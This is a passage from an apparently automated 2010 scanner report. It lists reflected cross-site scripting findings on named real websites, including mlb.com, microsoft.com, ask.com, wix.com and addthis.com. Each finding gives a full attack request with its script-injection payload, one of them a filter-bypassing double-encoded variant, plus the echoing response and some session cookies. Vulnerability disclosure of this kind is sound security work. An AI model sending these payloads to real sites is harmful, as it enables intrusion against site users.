orError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px9a5b8"><script>alert(1)</script>939b7359cb6&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px9a5b8"><script>alert(1)</script>939b7359cb6&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.83. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b08"><script>alert(1)</script>b44d30a1246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1 HTTP/1.1
Host: mlb.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=600
Expires: Sat, 20 Nov 2010 18:06:26 GMT
Date: Sat, 20 Nov 2010 17:56:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131968


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<meta property="og:url" content="http://mlb.mlb.com/index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1&tcid=fb_share" />
...[SNIP]...

2.84. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64c2"><script>alert(1)</script>740e1573786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?a64c2"><script>alert(1)</script>740e1573786=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABNBgAAM19VJr1F78JLHJiR+JO+Sw!!&M=1; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 20 Nov 2010 17:56:35 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?a64c2"><script>alert(1)</script>740e1573786=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

2.85. http://siteanalytics.compete.com/DOMAIN/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://siteanalytics.compete.com
Path:   /DOMAIN/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bff31<a%20b%3dc>ace790abb9 was submitted in the REST URL parameter 1. This input was echoed as bff31<a b=c>ace790abb9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /DOMAINbff31<a%20b%3dc>ace790abb9/ HTTP/1.1
Host: siteanalytics.compete.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:52:54 GMT
Server: Apache
Vary: Cookie
Content-Length: 20140
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<h1>
domainbff31<a b=c>ace790abb9
</h1>
...[SNIP]...

2.86. http://ss.ask.com/query [fn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the fn request parameter is copied into the HTML document as plain text between tags. The payload f9815<script>alert(1)</script>172a4ed3072 was submitted in the fn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestionf9815<script>alert(1)</script>172a4ed3072&q=los+angele&limit=8&timestamp=1290271578074 HTTP/1.1
Accept: */*
Referer: http://www.ask.com/?o=0&l=dir
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ss.ask.com
Proxy-Connection: Keep-Alive
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmb=252994457.1.10.1290271572; __utmc=252994457; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_scnt=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:53:44 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 709
Content-Type: text/javascript

searchSuggestionf9815<script>alert(1)</script>172a4ed3072(["los angele",
["<span class=\\\"suggest\\\">los angele</span>s short film festival","<span class=\\\"suggest\\\">los angele</span>s","<span
...[SNIP]...

2.87. http://ss.ask.com/query [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload f1910<script>alert(1)</script>016f7840526 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion&q=los+angelef1910<script>alert(1)</script>016f7840526&limit=8&timestamp=1290271578074 HTTP/1.1
Accept: */*
Referer: http://www.ask.com/?o=0&l=dir
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ss.ask.com
Proxy-Connection: Keep-Alive
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmb=252994457.1.10.1290271572; __utmc=252994457; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_scnt=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:53:46 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 79
Content-Type: text/javascript

searchSuggestion(["los angelef1910<script>alert(1)</script>016f7840526",
[]]);

2.88. http://static.wix.com/client/getComponentsTypeList.php [componentTypeViewerList parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wix.com
Path:   /client/getComponentsTypeList.php

Issue detail

The value of the componentTypeViewerList request parameter is copied into the XML document as plain text between tags. The payload 18780%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb4ced27665b was submitted in the componentTypeViewerList parameter. This input was echoed as 18780<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b4ced27665b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the componentTypeViewerList request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /client/getComponentsTypeList.php?componentTypeViewerList=5minMediaControl,CtrlSimple,FiveGridLine,MediaControlPlaylist,StackerCarousel,StackerGallery,StackerSlider,TextButton3G,TextButtonSkinnable,YoutubeMediaControl,alphaOnRoll,animatingButton,area,areaScrollPane,areaScrollText,arrangerMenu,basicShape,contactForm,expand,flashAdjustColor,flashBlend,flashTint,generalExternal,glowOnRoll,gotoRight,gotoSecureURL,gotoState,gotoStateOnRoll,gotoURL,groupHolder,loginView,matrixArranger,media,paraText,photoAlbomScroll,photoFrame,photoStackerGallery,picture,soundOnRoll,textButtonMenu,textButtonMenuHorz,textButtonMenuVert,titleText,viewStack,wizard18780%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb4ced27665b&cacheKiller=U021 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://static.wix.com/client/app.swf?v=95
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: static.wix.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.6-1+lenny9
Last-Modified: Mon, 15 Nov 2010 08:23:15 GMT
Etag: 785b80e09d49a8c8f04cc2864095135e
Content-Type: text/xml
Date: Sat, 20 Nov 2010 16:52:51 GMT
Server: sputnik4
Accept-Ranges: bytes
Cache-Control: private, max-age=10800
Age: 0
Expires: Sat, 20 Nov 2010 19:52:51 GMT
x-cdn: Served by Cotendo
Connection: Keep-Alive
Content-Length: 45234

<?xml version="1.0" encoding="UTF-8" ?>
<component-type-list-result success="true" errorCode="0" errorDescription="OK">
<!-- filename = 5minMediaControl -->
<component-type component_type="5minMedi
...[SNIP]...
<!-- filename = wizard18780<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b4ced27665b -->
...[SNIP]...

2.89. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f34c<script>alert(1)</script>318892cabab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php8f34c<script>alert(1)</script>318892cabab HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=p81rjp77olcodosmm631qfhim3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php8f34c<script>alert(1)</script>318892cabab</strong>
...[SNIP]...

2.90. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb9a"-alert(1)-"112f98354b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php6eb9a"-alert(1)-"112f98354b8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php6eb9a"-alert(1)-"112f98354b8";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.91. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c07c"-alert(1)-"345ff452a56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/6c07c"-alert(1)-"345ff452a56 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/6c07c"-alert(1)-"345ff452a56";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.92. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c82d9<script>alert(1)</script>fdcbc7a51dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMTc82d9<script>alert(1)</script>fdcbc7a51dd HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:10:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMTc82d9<script>alert(1)</script>fdcbc7a51dd</strong>
...[SNIP]...

2.93. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3af4b"-alert(1)-"778de5bfb4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT3af4b"-alert(1)-"778de5bfb4b HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:10:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT3af4b"-alert(1)-"778de5bfb4b";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.94. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52985<script>alert(1)</script>c2109c4da0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT?52985<script>alert(1)</script>c2109c4da0c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:09:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT?52985<script>alert(1)</script>c2109c4da0c=1</strong>
...[SNIP]...

2.95. http://www.addthis.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cfd7<script>alert(1)</script>e725d8a4db7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8cfd7<script>alert(1)</script>e725d8a4db7 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.addthis.com
Proxy-Connection: Keep-Alive
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:11:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>favicon.ico8cfd7<script>alert(1)</script>e725d8a4db7</strong>
...[SNIP]...

2.96. http://www.addthis.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /favicon.ico

Issue detail

